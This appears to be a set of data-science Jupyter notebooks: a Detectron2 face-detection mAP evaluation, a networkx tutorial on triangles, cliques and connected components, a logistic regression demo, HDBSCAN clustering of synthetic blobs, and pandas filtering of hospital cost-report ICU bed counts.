        pbxs=outputs['instances'].pred_boxes.tensor.tolist()
        pconfs=outputs['instances'].scores.tolist()
        # round box corners to integer pixels and append the confidence
        dbx=[[*(np.array(bx)+0.5).astype('int'),pconfs[i]] for i,bx in enumerate(pbxs)]
        dbxs.append(dbx)
        gbxs.append(d['marks'] if d['marks']!=[0,0,0,0] else []) #########################
        # lightweight textual progress indicator
        if not i%100 : print('\r',ext,' ',Len,' imgs : ',i//100*100,' +',end='')
        if not (i+1)%10 : print(' ',(i+1)%100,end='')
    total=time.time()-start
    print('\r',name,ext,' - total time {:.2f} s per img {:.4f} s'.format(total,total/(i+1)))
    # IoUs=[.5,.55,.6,.65,.7,.75,.8,.85,.9,.95,.0]
    # keys ['All {:.2f}' for x in IoUs] + ['large','medium','small'] for IoUs[0]
    # r_p: 0 - interpolated, 1 - full
    m,d=mAP(gbxs,dbxs,data=True)
    plot_mAP(m,d,['All 0.50','All 0.00','large','medium','small'],1,name+ext+' conf>0',file=name+ext)
    if pres:
        # show a fixed set of example indices (when the data set is large enough)
        for l in [58,233,259,365,388,394,413,424,446,455,483,532,683,709,722,802,809,874,759]:
            if l < Len:
                m=dset[l]
                print('------------------------ idx ',l,' gtx/dbxs',len(m['marks']),'/',len(dbxs[l]))
                plot_marks(Image.open(m['path']),m,dbxs[l],figsize=(18,14))
    return {'gbxs':gbxs,'dbxs':dbxs,'metric':dset}
#['FrozenBN', 'BN', 'BN_V2', 'BN_Mish', 'BN_Mish_V2', 'BN_Mish_V3', 'BN_Mish_V2F'] cfg sets
# Register checkpoints to evaluate: (cfg_set index, kilo-iterations, drive id, suffix).
test_set_add(6,300,'10JXHtaSjBtDt0b0Sa6X4esBSysnBb2v-','_250+F_22')
test_set_add(4,250,'1-NY6ZeI_0YsI6axbBG9kGpcAr-M0S4wT',) #best result, used for further fine-tuning
test_set_add(6,50,'1-I6YSAs9NrORI4cFISfK_-4Yhm1twfDi','_250+F_2') # best fine-tuning result
with open('WIDER_test_set.json','w')as f:
    json.dump(test_set,f)
```
#wybór zestawów do analizy
```
# List registered fine-tuned sets and sanity-check the chosen ones exist.
for key in test_set.keys():
    if 'F_2' in key: print(key)
set_choices=['BN_Mish_V2_250+F_2_100k',] #'BN_Mish_V2F_250+F_22_300k']
for c in set_choices:
    if c in test_set.keys(): print(c,' is OK, ',end='')
    else: print('\n!!!!!!! ',c,' is not in test_set!, ',end='')
set_choices[0],test_set[set_choices[0]]
predictor,cfg,ext=set_predictor(set_choices[-1],device='cuda') #normally cuda
print(cfg.dump())
# Visualise predictions on a fixed list of validation images ...
l = [58,233,259,365,388,394,413,424,446,455,483,532,683,709,722,802,809,874,759]
for i in l:
    d=val[i]
    im = cv2.imread(d["file_name"])
    outputs = predictor(im[:, :, ::])
    v = Visualizer(im,metadata=faces_metadata, scale=.7)
    v = v.draw_instance_predictions(outputs["instances"].to("cpu"))
    cv2_imshow(v.get_image()[:, :, ::])
# ... and on 5 random validation images.
for d in random.sample(val, 5):
    im = cv2.imread(d["file_name"])
    outputs = predictor(im[:, :, ::])
    v = Visualizer(im,metadata=faces_metadata, scale=0.7)
    v = v.draw_instance_predictions(outputs["instances"].to("cpu"))
    cv2_imshow(v.get_image()[:, :, ::])
!rm D*
# Evaluate each chosen checkpoint on Faces_DD and on the WIDER val split.
for c in set_choices:
    predictor,cfg,ext =set_predictor(c)
    resF[c]=results(Faces_DD,predictor,'Detectron2_Faces_DD_mAP_MN2_',ext,pres=False)
    resW[c]=results(val,predictor,'Detectron2_Wider_Face_mAP_MN2_',ext,pres=False)
# COCO-style summary: average AP over the thresholds 0.50 .. 0.95.
for c in set_choices:
    res=mAP(resW[c]['gbxs'],resW[c]['dbxs'],data=False)
    Ap=[]
    for i in range(10):
        Ap.append(res[0]['All {:.2f}'.format(0.5+i*0.05)][0])
    print(c,' mAP: ',sum(Ap)/10,'\nset: ', Ap) #mean AP for conf [.5 ... 0.95]
resF[set_choices[0]]['metric'][0]
import json
def to_int(data):
    """Recursively replace integer scalars whose type name contains 'int'
    (e.g. numpy int32/int64) with plain Python ints so the structure becomes
    json-serialisable. Tuples are converted to lists; dicts and lists are
    updated in place. Returns the (possibly new) object."""
    if isinstance(data, dict):
        for k in data:
            data[k] = to_int(data[k])
    if isinstance(data, list):
        for idx, item in enumerate(data):
            data[idx] = to_int(item)
    if isinstance(data, tuple):
        data = [to_int(item) for item in data]
    if 'int' in type(data).__name__:
        data = int(data)
    return data
# json only supports whole numbers as built-in int, so convert first.
iresF = to_int(resF)
iresW = to_int(resW)
with open('Results Detectron2_mobilenetV2_Faces.json','w') as f:
    json.dump(iresF,f)
with open('Results Detectron2_mobilenetV2_Wider.json','w') as f:
    json.dump(iresW,f)
# Plot ground truth vs detections for selected Faces_DD images
# (first checkpoint only).  NOTE: .values() unpacking relies on the
# {'gbxs','dbxs','metric'} insertion order of the results dicts.
for c in list(iresF.keys())[:1]:
    _,d,ms=iresF[c].values(); num=len(ms) # d: detections (dbxs), ms: per-image metrics
    for l in [58,233,259,365,388,394,413,424,446,455,483,532,683,709,722,802,809,874,759]:
        if l < num:
            m=ms[l]
            print('------------------------ idx ',l,' gtx/dbxs',len(m['marks']),'/',len(d[l]))
            plot_marks(Image.open(m['path']),m,d[l],figsize=(16,12))
# Same preview on the WIDER validation set (last checkpoint only).
for c in list(iresW.keys())[-1:]:
    _,d,ms=iresW[c].values(); num=len(ms) # d: detections (dbxs), ms: per-image metrics
    for l in [58,233,259,365,388,394,413,424,446,455,483,532,683,709,722,802,809,874,759]:
        if l < num:
            m=ms[l]
            print('------------------------ idx ',l,' gtx/dbxs',len(m['marks']),'/',len(d[l]))
            plot_marks(Image.open(m['path']),m,d[l],figsize=(16,12))
# Add the generated plots to the PNG archive (update only).
!zip -u PNG D*.png
# MTCNN initialisation, full description available via: help(MTCNN)
#mtcnn = MTCNN(image_size=224, margin=0, keep_all=True)
```
total time 1317.56 per img 0.4084
#Eval na train
```
# COCO evaluation of the trained detector on the TRAINING split.
cfg.OUTPUT_DIR='./OUTPUT'
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.05 # set the testing threshold for this model
cfg.DATASETS.TEST = ("face_train", )
cfg.DATASETS.VAL = ("face_val", )
trainer =DefaultTrainer(cfg)
trainer.resume_or_load(resume=True) # reload the last checkpoint from OUTPUT_DIR
cfg.MODEL.WEIGHTS
MetadataCatalog.get('face_val'),MetadataCatalog.get('face_train')
from detectron2.evaluation import COCOEvaluator, inference_on_dataset
from detectron2.data import build_detection_test_loader
evaluator = COCOEvaluator("face_train", cfg, False, output_dir="./OUTPUT/")
val_loader = build_detection_test_loader(cfg, "face_train")
inference_on_dataset(trainer.model, val_loader, evaluator)
```
#eval +100k
```
# COCO evaluation of the fine-tuned (+100k iterations) model on the
# validation split.
from detectron2.evaluation import COCOEvaluator, inference_on_dataset
from detectron2.data import build_detection_test_loader
evaluator = COCOEvaluator("face_val", cfg, False, output_dir="./OUTPUT/")
val_loader = build_detection_test_loader(cfg, "face_val")
inference_on_dataset(trainer.model, val_loader, evaluator)
```
#test Script modelu
```
import time
import torch
import json
import numpy as np
from PIL import Image
from WIDER.mAP import mAP, plot_mAP
from WIDER.tools import annotations,output_Files
# NOTE(review): 'train' is loaded from the "val" annotations here — confirm
# this is intentional (quick test) and not a typo.
train = annotations("val")
val = annotations('val')
with open('Faces_DD/Faces_DD_metrics.json','r') as f:
    Faces_DD=json.load(f)
resF,resW ={},{} # results for Faces and Wider: {gbxs,dbxs,metric}
# Load the TorchScript model.  It takes a fixed-size input
# ([image BGR<3,800,1216>,],[[h,w,scale],]) where (h,w) is the valid window
# and scale restores the original resolution.
!wget -q -O model.ts https://drive.google.com/uc?id=107Ym7yjAQlA6FhzAQvHoPITZnsm8Z5Co
model=torch.jit.load('model.ts')
# keep aspect ratio while matching the model's (800, 1216) input size
def to_inputs(img):
    """Build the fixed-size (800, 1216) batch the TorchScript model expects.

    Takes a PIL image, keeps the aspect ratio, and returns
    (images, image_args): a (1, 3, 800, 1216) BGR tensor on the GPU and a
    (1, 3) tensor carrying (h, w, scale) so detections can be mapped back
    to the original resolution.
    """
    # Scale so the width matches the model input width (1216).
    # PIL's img.size is (width, height).
    scale=1216/img.size[0]
    size=(int(img.size[1]*scale),1216)  # (height, width) after scaling
    if size[0]>800:
        # Too tall: rescale so the height fits the 800-pixel limit instead.
        scale=800/size[0]
        size=(800,int(size[1]*scale))
    scale=size[1]/img.size[0]  # final width ratio used to rescale boxes back
    img_arg=torch.tensor([*size,scale])  # model-side metadata (h, w, scale)
    # Resize, then crop/pad to exactly 1216x800.
    img=img.resize((size[1],size[0])).crop((0,0,1216,800))
    # RGB -> BGR, HWC -> CHW, add batch dimension: (1, 3, 800, 1216) on GPU.
    imgs=torch.tensor(np.array(img)[:,:,::-1].copy()).permute(2,0,1).expand(1,3,800,1216).cuda() #BGR 3,800,1216
    return (imgs,img_arg.expand(1,3).cuda())
def script_results(d_set,model,name='mAP_',ext='ScriptModel',pres=False):
    """Run the TorchScript detector over a dataset and compute/plot mAP.

    d_set: list of records, either WIDER-style (with 'annotations') or
    Faces-style (with 'path'/'marks'/'persons').  model: a loaded
    TorchScript module.  name/ext: prefix/suffix for the saved mAP plot
    file.  pres: if True, also plot ground truth vs detections for a fixed
    list of sample indices.  Returns {'gbxs': ..., 'dbxs': ..., 'metric': ...}.
    """
    start=time.time()
    gbxs=[]; dbxs=[]; dset=d_set
    if 'annotations' in d_set[0].keys(): # convert WIDER records to the Faces metric layout (selected fields)
        dset=[]
        for r in d_set:
            dset.append({'path' : r['file_name'],'marks' : [b['bbox'] for b in r['annotations']],
            'persons': ['' for b in r['annotations']]})
    Len=len(dset); print(ext,' ',Len,' imgs : 0 +',end='')
    if 'Script' in model.__class__.__name__:
        for i,d in enumerate(dset): # collect detected and ground-truth boxes
            img = Image.open(d["path"])
            inputs=to_inputs(img)
            _,_,s = inputs[1][0].cpu() # scale factor back to the original image
            outputs=model(inputs)
            pbxs=outputs[0].cpu()
            pconfs=outputs[1].cpu()
            # Round box coordinates to int and append the confidence score.
            dbx=[[*(np.array(bx)+0.5).astype('int'),pconfs[i]] for i,bx in enumerate(pbxs)]
            dbxs.append(dbx)
            gbxs.append([[int(x*s+0.5) for x in bx] for bx in d['marks']]) # rescale annotations to model space
            # Console progress: hundreds overwrite the line, tens append.
            if not i%100 : print('\r',ext,' ',Len,' imgs : ',i//100*100,' +',end='')
            if not (i+1)%10 : print(' ',(i+1)%100,end='')
    total=time.time()-start
    # NOTE(review): 'i' is only bound if the detection loop ran at least
    # once (Script model and non-empty dset); otherwise this line raises.
    print('\r',name,ext,' - total time {:.2f} s per img {:.4f} s'.format(total,total/(i+1)))
    # IoUs=[.5,.55,.6,.65,.7,.75,.8,.85,.9,.95,.0]
    # keys ['All {:.2f}' for x in IoUs] + ['large','medium','small'] for IoUs[0]
    # r_p: 0 - interpolated, 1 - full
    m,d=mAP(gbxs,dbxs,data=True)
    plot_mAP(m,d,['All 0.50','All 0.00','large','medium','small'],1,name+ext+' conf>0',file=name+ext)
    if pres:
        # Preview ground truth vs detections for the fixed sample indices.
        for l in [58,233,259,365,388,394,413,424,446,455,483,532,683,709,722,802,809,874,759]:
            if l < Len:
                m=dset[l]
                print('------------------------ idx ',l,' gtx/dbxs',len(m['marks']),'/',len(dbxs[l]))
                plot_marks(Image.open(m['path']),m,dbxs[l],figsize=(18,14))
    return {'gbxs':gbxs,'dbxs':dbxs,'metric':dset}
# Run the TorchScript model over both datasets and report COCO-style mAP.
set_choices=['ScriptModel',]
for c in set_choices:
    resF[c]=script_results(Faces_DD,model,'Detectron2_Faces_DD_mAP_',c,pres=False)
    resW[c]=script_results(val,model,'Detectron2_Wider_Face_mAP_',c,pres=False)
for c in set_choices:
    res=mAP(resW[c]['gbxs'],resW[c]['dbxs'],data=False)
    Ap=[]
    for i in range(10):
        # AP at IoU thresholds 0.50, 0.55, ..., 0.95
        Ap.append(res[0]['All {:.2f}'.format(0.5+i*0.05)][0])
    print(c,' mAP: ',sum(Ap)/10,'\nset: ', Ap) # mean AP for IoU in [.5 ... 0.95]
```
<br><br>
[7. Eksport modelu](07_00_Eksport_modelu.ipynb)
###[Spis Treści](https://github.com/DarekGit/FACES_DNN/blob/master/notebooks/Praca_Dyplomowa.ipynb)
| github_jupyter |
```
import networkx as nx
import matplotlib.pyplot as plt
import warnings
from custom import custom_funcs as cf
warnings.filterwarnings('ignore')
%matplotlib inline
%load_ext autoreload
%autoreload 2
```
# Cliques, Triangles and Squares
Let's pose a problem: If A knows B and B knows C, would it be probable that A knows C as well? In a graph involving just these three individuals, it may look as such:
```
# Build the three-person example: A knows B and B knows C.
G = nx.Graph()
G.add_edge('a', 'b')  # nodes are created implicitly by add_edge
G.add_edge('b', 'c')
nx.draw(G, with_labels=True)
```
Let's think of another problem: If A knows B, B knows C, C knows D and D knows A, is it likely that A knows C and B knows D? How would this look like?
```
# Close the cycle: add D plus edges C-D and D-A, forming a square A-B-C-D.
G.add_node('d')
G.add_edge('c', 'd')
G.add_edge('d', 'a')
nx.draw(G, with_labels=True)
```
The set of relationships involving A, B and C, if closed, involves a triangle in the graph. The set of relationships that also include D form a square.
You may have observed that social networks (LinkedIn, Facebook, Twitter etc.) have friend recommendation systems. How exactly do they work? Apart from analyzing other variables, closing triangles is one of the core ideas behind the system. A knows B and B knows C, then A probably knows C as well.
If all of the triangles in the two small-scale networks were closed, then the graph would have represented **cliques**, in which everybody within that subgraph knows one another.
In this section, we will attempt to answer the following questions:
1. Can we identify cliques?
2. Can we identify *potential* cliques that aren't currently present in the network?
3. Can we model the probability that two unconnected individuals know one another?
## Load Data
As usual, let's start by loading some network data. This time round, we have a [physician trust](http://konect.uni-koblenz.de/networks/moreno_innovation) network, but slightly modified such that it is undirected rather than directed.
> This directed network captures innovation spread among 246 physicians in four towns in Illinois: Peoria, Bloomington, Quincy and Galesburg. The data was collected in 1966. A node represents a physician, and an edge between two physicians shows that the left physician said that the right physician is his friend, or that he turns to the right physician if he needs advice or is interested in a discussion. There always exists only one edge between two nodes, even if more than one of the listed conditions is true.
```
# Load the physician-trust network.
G = cf.load_physicians_network()
# Make a Circos plot of the graph
import numpy as np
from circos import CircosPlot
nodes = sorted(G.nodes())
edges = G.edges()
edgeprops = dict(alpha=0.1)
# One viridis colour per node, in the same order as `nodes`.
nodecolor = plt.cm.viridis(np.arange(len(nodes)) / len(nodes))
fig = plt.figure(figsize=(6,6))
ax = fig.add_subplot(111)
c = CircosPlot(nodes, edges, radius=10, ax=ax, edgeprops=edgeprops, nodecolor=nodecolor)
c.draw()
```
### Question
What can you infer about the structure of the graph from the Circos plot?
My answer: The structure is interesting. The graph looks like the physician trust network is comprised of discrete subnetworks.
## Cliques
In a social network, cliques are groups of people in which everybody knows everybody. Triangles are a simple example of cliques. Let's try implementing a simple algorithm that finds out whether a node is present in a triangle or not.
The core idea is that if a node is present in a triangle, then its neighbors' neighbors' neighbors should include itself.
```
# Example code that shouldn't be too hard to follow.
def in_triangle(G, node):
    """Return True if `node` is part of at least one triangle in G.

    A triangle exists exactly when `node` shares a neighbour with one of
    its own neighbours: node - n - m - node.
    """
    neighbors = set(G.neighbors(node))
    for n in neighbors:
        # Any common neighbour of `node` and `n` closes a triangle.
        # (Assuming no self-loops, the intersection can contain neither
        # `node` nor `n` itself, so a non-empty result is conclusive.)
        if neighbors.intersection(G.neighbors(n)):
            return True
    return False
in_triangle(G, 3)
```
In reality, NetworkX already has a function that *counts* the number of triangles that any given node is involved in. This is probably more useful than knowing whether a node is present in a triangle or not, but the above code was simply for practice.
```
nx.triangles(G, 3)
```
### Exercise
Can you write a function that takes in one node and its associated graph as an input, and returns a list or set of itself + all other nodes that it is in a triangle relationship with?
Hint: The neighbor of my neighbor should also be my neighbor, then the three of us are in a triangle relationship.
Hint: Python Sets may be of great use for this problem. https://docs.python.org/2/library/stdtypes.html#set
Verify your answer by drawing out the subgraph composed of those nodes.
```
# Possible answer
def get_triangles(G, node):
    # Exercise skeleton: return `node` plus every node that forms a
    # triangle with it.  The body is intentionally left for the reader.
    neighbors = set(G.neighbors(node))
    triangle_nodes = set()
    """
    Fill in the rest of the code below.
    """
    return triangle_nodes
# Verify your answer with the following function call. Should return:
# {1, 2, 3, 6, 23}
get_triangles(G, 3)
# Then, draw out those nodes.
nx.draw(G.subgraph(get_triangles(G, 3)), with_labels=True)
# Compare for yourself that those are the only triangles that node 3 is involved in.
# G.neighbors() returns an iterator in NetworkX >= 2.0 (it has no
# .append()), so materialise it as a list before adding node 3 itself.
neighbors3 = list(G.neighbors(3))
neighbors3.append(3)
nx.draw(G.subgraph(neighbors3), with_labels=True)
```
# Friend Recommendation: Open Triangles
Now that we have some code that identifies closed triangles, we might want to see if we can do some friend recommendations by looking for open triangles.
Open triangles are like those that we described earlier on - A knows B and B knows C, but C's relationship with A isn't captured in the graph.
### Exercise
Can you write a function that identifies, for a given node, the other two nodes that it is involved with in an open triangle, if there is one?
Hint: You may still want to stick with set operations. Suppose we have the A-B-C triangle. If there are neighbors of C that are also neighbors of B, then those neighbors are in a triangle with B and C; consequently, if there are nodes for which C's neighbors do not overlap with B's neighbors, then those nodes are in an open triangle. The final implementation should include some conditions, and probably won't be as simple as described above.
```
# Possible Answer, credit Justin Zabilansky (MIT) for help on this.
def get_open_triangles(G, node):
    """
    Exercise skeleton: enumerate every open triangle `node` takes part in.

    There are many ways to represent this. One may choose to represent only
    the nodes involved in an open triangle; this is not the approach taken
    here. Rather, we have code that explicitly enumerates every open
    triangle present.  The loop body is intentionally left for the reader.
    """
    open_triangle_nodes = []
    neighbors = set(G.neighbors(node))
    for n in neighbors:
        # placeholder body: fill in the open-triangle detection here
        return open_triangle_nodes
# # Uncomment the following code if you want to draw out each of the triplets.
# nodes = get_open_triangles(G, 2)
# for i, triplet in enumerate(nodes):
# fig = plt.figure(i)
# nx.draw(G.subgraph(triplet), with_labels=True)
print(get_open_triangles(G, 3))
len(get_open_triangles(G, 3))
```
If you remember the previous section on hubs and paths, you will note that node 19 was involved in a lot of open triangles.
Triangle closure is also the core idea behind social networks' friend recommendation systems; of course, it's definitely more complicated than what we've implemented here.
## Cliques
We have figured out how to find triangles. Now, let's find out what **cliques** are present in the network. Recall: what is the definition of a clique?
- NetworkX has a [clique-finding](https://networkx.github.io/documentation/networkx-1.10/reference/generated/networkx.algorithms.clique.find_cliques.html) algorithm implemented.
- This algorithm finds all maximally-sized cliques for a given node.
- Note that maximal cliques of size `n` include all cliques of `size < n`
```
list(nx.find_cliques(G))
```
### Exercise
This should allow us to find all n-sized maximal cliques. Try writing a function `maximal_cliques_of_size(size, G)` that implements this.
```
def maximal_cliqes_of_size(size, G):
    # Exercise: return all maximal cliques in G that have exactly `size`
    # nodes (e.g. by filtering nx.find_cliques(G) on length).
    return ______________________
maximal_cliqes_of_size(2, G)
```
## Connected Components
From [Wikipedia](https://en.wikipedia.org/wiki/Connected_component_%28graph_theory%29):
> In graph theory, a connected component (or just component) of an undirected graph is a subgraph in which any two vertices are connected to each other by paths, and which is connected to no additional vertices in the supergraph.
NetworkX also implements a [function](https://networkx.github.io/documentation/networkx-1.9.1/reference/generated/networkx.algorithms.components.connected.connected_component_subgraphs.html) that identifies connected component subgraphs.
Remember how based on the Circos plot above, we had this hypothesis that the physician trust network may be divided into subgraphs. Let's check that, and see if we can redraw the Circos visualization.
```
# nx.connected_component_subgraphs() was deprecated in NetworkX 2.1 and
# removed in 2.4; build the subgraphs from connected_components() instead.
ccsubgraphs = [G.subgraph(c).copy() for c in nx.connected_components(G)]
len(ccsubgraphs)
```
### Exercise
Play a bit with the Circos API. Can you colour the nodes by their subgraph identifier?
```
# Start by labelling each node in the master graph G by some number
# that represents the subgraph that contains the node.
for i, g in enumerate(_____________):  # exercise: iterate the component subgraphs
# Then, pass in a list of nodecolors that correspond to the node order.
node_cmap = {0: 'red', 1:'blue', 2: 'green', 3:'yellow'}
nodecolor = [__________________________________________]  # exercise: one colour per node, by subgraph id
nodes = sorted(G.nodes())
edges = G.edges()
edgeprops = dict(alpha=0.1)
fig = plt.figure(figsize=(6,6))
ax = fig.add_subplot(111)
c = CircosPlot(nodes, edges, radius=10, ax=ax, fig=fig, edgeprops=edgeprops, nodecolor=nodecolor)
c.draw()
plt.savefig('images/physicians.png', dpi=300)
```
And "admire" the division of the US congress over the years...

| github_jupyter |
```
# Logistic Regression
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset: columns 2-3 (Age, EstimatedSalary) predict
# column 4 (Purchased).
dataset = pd.read_csv('Social_Network_Ads.csv')
X = dataset.iloc[:, [2, 3]].values
y = dataset.iloc[:, 4].values
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)
# Feature Scaling: fit on the training set only, apply the same transform
# to the test set to avoid leakage.
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
# Fitting Logistic Regression to the Training set
from sklearn.linear_model import LogisticRegression
classifier = LogisticRegression(random_state = 0)
classifier.fit(X_train, y_train)
# Predicting the Test set results
y_pred = classifier.predict(X_test)
# Making the Confusion Matrix
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
# Visualising the Training set results: colour the plane by the model's
# decision regions (0.01-step grid), then overlay the actual points.
from matplotlib.colors import ListedColormap
X_set, y_set = X_train, y_train
X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 1, stop = X_set[:, 0].max() + 1, step = 0.01),
                     np.arange(start = X_set[:, 1].min() - 1, stop = X_set[:, 1].max() + 1, step = 0.01))
plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),
             alpha = 0.75, cmap = ListedColormap(('red', 'green')))
plt.xlim(X1.min(), X1.max())
plt.ylim(X2.min(), X2.max())
for i, j in enumerate(np.unique(y_set)):
    plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],
                c = ListedColormap(('red', 'green'))(i), label = j)
plt.title('Logistic Regression (Training set)')
plt.xlabel('Age')
plt.ylabel('Estimated Salary')
plt.legend()
plt.show()
# Visualising the Test set results (same plot on the held-out data)
from matplotlib.colors import ListedColormap
X_set, y_set = X_test, y_test
X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 1, stop = X_set[:, 0].max() + 1, step = 0.01),
                     np.arange(start = X_set[:, 1].min() - 1, stop = X_set[:, 1].max() + 1, step = 0.01))
plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),
             alpha = 0.75, cmap = ListedColormap(('red', 'green')))
plt.xlim(X1.min(), X1.max())
plt.ylim(X2.min(), X2.max())
for i, j in enumerate(np.unique(y_set)):
    plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],
                c = ListedColormap(('red', 'green'))(i), label = j)
plt.title('Logistic Regression (Test set)')
plt.xlabel('Age')
plt.ylabel('Estimated Salary')
plt.legend()
plt.show()
| github_jupyter |
```
%matplotlib notebook
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.tri as tri
from matplotlib import cm
from mpl_toolkits.mplot3d import Axes3D
import hdbscan
from sklearn.datasets import make_blobs
from deepART import dataset
# Two tight Gaussian blobs in 2-D; y holds the ground-truth blob index.
x, y = make_blobs(n_samples=200, n_features=2, centers=np.array([[0.7, 0.55], [0.95,0.95]]), cluster_std=0.03, center_box=(0, 1), shuffle=True, random_state=100)
sample_data = dataset.Dataset(x)
fig = plt.figure(figsize=(8,8))
ax = fig.add_subplot(111)
ax.set_xlabel("X",fontsize=12)
ax.set_ylabel("Y",fontsize=12)
ax.grid(True,linestyle='-',color='0.75')
# scatter with colormap mapping to the ground-truth labels
ax.scatter(sample_data.data_normalized[...,0],sample_data.data_normalized[...,1],s=100,c=y,marker='*')
ax.axis((0, 1, 0, 1))
plt.ylim(0.4, 1.1)
plt.xlim(0.6, 1.1)
plt.show()
#fig.savefig('data_raw.png', bbox_inches='tight')
# Cluster the normalised points; prediction_data=True enables soft
# membership scores (clusterer.probabilities_).
clusterer = hdbscan.HDBSCAN(min_cluster_size=10, prediction_data=True).fit(sample_data.data_normalized)
clusterer.probabilities_
def unpack_results(pred, target, target_scores, data=None):
    """Collect the 2-D points and membership scores of one cluster.

    Parameters
    ----------
    pred : sequence of int
        Cluster label predicted for each sample.
    target : int
        Cluster label to select.
    target_scores : sequence of float
        Per-sample membership score, same order as `pred`.
    data : array-like of shape (n_samples, 2), optional
        Points to select from.  Defaults to the notebook-global
        `sample_data.data_normalized` (backward compatible with the
        original three-argument call).

    Returns
    -------
    (ndarray of shape (k, 2), list of float)
    """
    if data is None:
        data = sample_data.data_normalized  # notebook global, as before
    rows = [n for n, label in enumerate(pred) if label == target]
    scores = [target_scores[n] for n in rows]
    # Single vstack instead of one vstack per matching row (was O(n^2)).
    base = np.empty((0, 2), dtype=np.float32)
    selected = [data[n] for n in rows]
    data_contour = np.vstack([base] + selected) if selected else base
    return data_contour, scores
def plot_countour(fig,data_contour, scores, sub_index, nplots=(3,2)):
    """Draw one cluster's membership scores as a filled tri-contour subplot.

    fig: figure to draw on.  data_contour: (k, 2) points of the cluster.
    scores: membership score per point.  sub_index: 1-based subplot index,
    also used as cluster number + 1 in the title.  nplots: subplot grid
    shape (rows, cols).
    """
    ax = fig.add_subplot(nplots[0],nplots[1],sub_index)
    ax.set_title("Clustering Results ",fontsize=14)
    ax.set_xlabel("X",fontsize=12)
    ax.set_ylabel("Y",fontsize=12)
    ax.grid(True,linestyle='-',color='0.75')
    # filled contour of the membership scores over the cluster's points
    ax.tricontour(data_contour[...,0], data_contour[...,1], scores, 14, linewidths=0, colors='k')
    cntr2 = ax.tricontourf(data_contour[...,0], data_contour[...,1], scores, 14, cmap="RdBu_r",)
    fig.colorbar(cntr2, ax=ax)
    ax.plot(data_contour[...,0], data_contour[...,1], 'ko', ms=0.5)
    ax.axis((0, 1, 0, 1))
    # Overwrites the generic title above with the cluster number.
    ax.set_title('Cluster {}'.format(int(sub_index-1)))
    plt.subplots_adjust(hspace=0.5)
    plt.show()
    #fig.savefig('data_clustered.png', bbox_inches='tight')
#fig.savefig('data_clustered.png', bbox_inches='tight')
# plot out cluster membership contours
fig = plt.figure(figsize=(8,8))
nplots = (int(np.ceil(2/2)), 2)  # subplot grid for the 2 clusters
for i in range(2):
    data_contour, scores = unpack_results(clusterer.labels_,target=i, target_scores=clusterer.probabilities_)
    plot_countour(fig, data_contour,scores, sub_index=i+1,nplots=nplots)
# plt.savefig("hdbscan_contour_1.png")
fig = plt.figure(figsize=(8,8))
ax = fig.add_subplot(111)
# ax.set_title("HDBSCAN's Predictions ",fontsize=14)
ax.set_xlabel("X",fontsize=12)
ax.set_ylabel("Y",fontsize=12)
# ax.set_ylabel("Z",fontsize=12)
ax.grid(True,linestyle='-',color='0.75')
# scatter with colormap mapping to predicted class
ax.scatter(sample_data.data_normalized[...,0],sample_data.data_normalized[...,1],s=100,c=clusterer.labels_, marker = '*', cmap = cm.jet_r );
plt.show()
# plt.savefig("hdbscan_correct_1.png")
clusterer.labels_
y
# HDBSCAN's 0/1 labels are swapped relative to the ground truth here;
# remap before computing classification metrics.
mapping = {0:1, 1: 0}
pred_labels = list(map(lambda i: mapping[i], clusterer.labels_))
from sklearn.metrics import silhouette_score, davies_bouldin_score, precision_score, recall_score, f1_score, accuracy_score, normalized_mutual_info_score
def obtain_metrics(x, y_true, y_pred):
    """Compute clustering and classification quality metrics.

    Returns a dict mapping metric name -> score for the data `x`,
    ground-truth labels `y_true` and predicted labels `y_pred`.
    """
    # Internal (label-free) clustering metrics use the data itself.
    results = {
        "silhouette_score": silhouette_score(x, y_pred),
        "davies_bouldin_score": davies_bouldin_score(x, y_pred),
    }
    # External metrics compare predictions against the ground truth.
    label_metrics = {
        "normalized_mutual_info_score": normalized_mutual_info_score,
        "precision_score": precision_score,
        "recall_score": recall_score,
        "f1_score": f1_score,
        "accuracy_score": accuracy_score,
    }
    for metric_name, metric_fn in label_metrics.items():
        results[metric_name] = metric_fn(y_true, y_pred)
    return results
obtain_metrics(sample_data.data_normalized, y, pred_labels)
```
| github_jupyter |
```
import pandas as pd
```
Gonna try a test of grabbing the ICU beds
**Starting with 2019 data for ease of use, I first read in the numeric data. I created new headers because they didn't bother to include them.**
```
# Numeric (NMRC) file: one row per (report, worksheet, line, column) cell.
# LINE_NUM and CLMN_NUM are zero-padded codes ('00800', '00200'); without
# dtype=str pandas parses CLMN_NUM as an integer, and the later string
# filter  num['CLMN_NUM'] == '00200'  silently matches nothing.
num = pd.read_csv('../source/cost_reports/2017/HOSP10FY2017/hosp10_2017_NMRC.CSV', header=None, names=['RPT_REC_NUM','WKSHT_CD',
                  'LINE_NUM', 'CLMN_NUM','ITM_VAL_NUM'],
                  dtype={'LINE_NUM':str, 'CLMN_NUM':str})
num.head()
num.info()
```
**Then, I filter the numeric data to just the line I want: Worksheet S3, line 8, column 2: The number of ICU beds in each report.**
```
# Worksheet S-3 Part I ('S300001'), line 8, column 2: ICU bed count per
# cost report.  NOTE(review): these string comparisons only match if
# CLMN_NUM/LINE_NUM were read as str (zero-padded codes) — confirm the
# read_csv dtype settings.
icu_beds = num[(num['WKSHT_CD'] == 'S300001') & (num['CLMN_NUM'] == '00200') & (num.LINE_NUM == '00800')]
icu_beds.head()
icu_beds.ITM_VAL_NUM.sum()
```
**Adding the RPT dataset allows me to grab the provider number of each hospital, as well as its report status (since this is a newer datset, many have blanks)**
```
# Report-level (RPT) file: one row per cost report, keyed by RPT_REC_NUM.
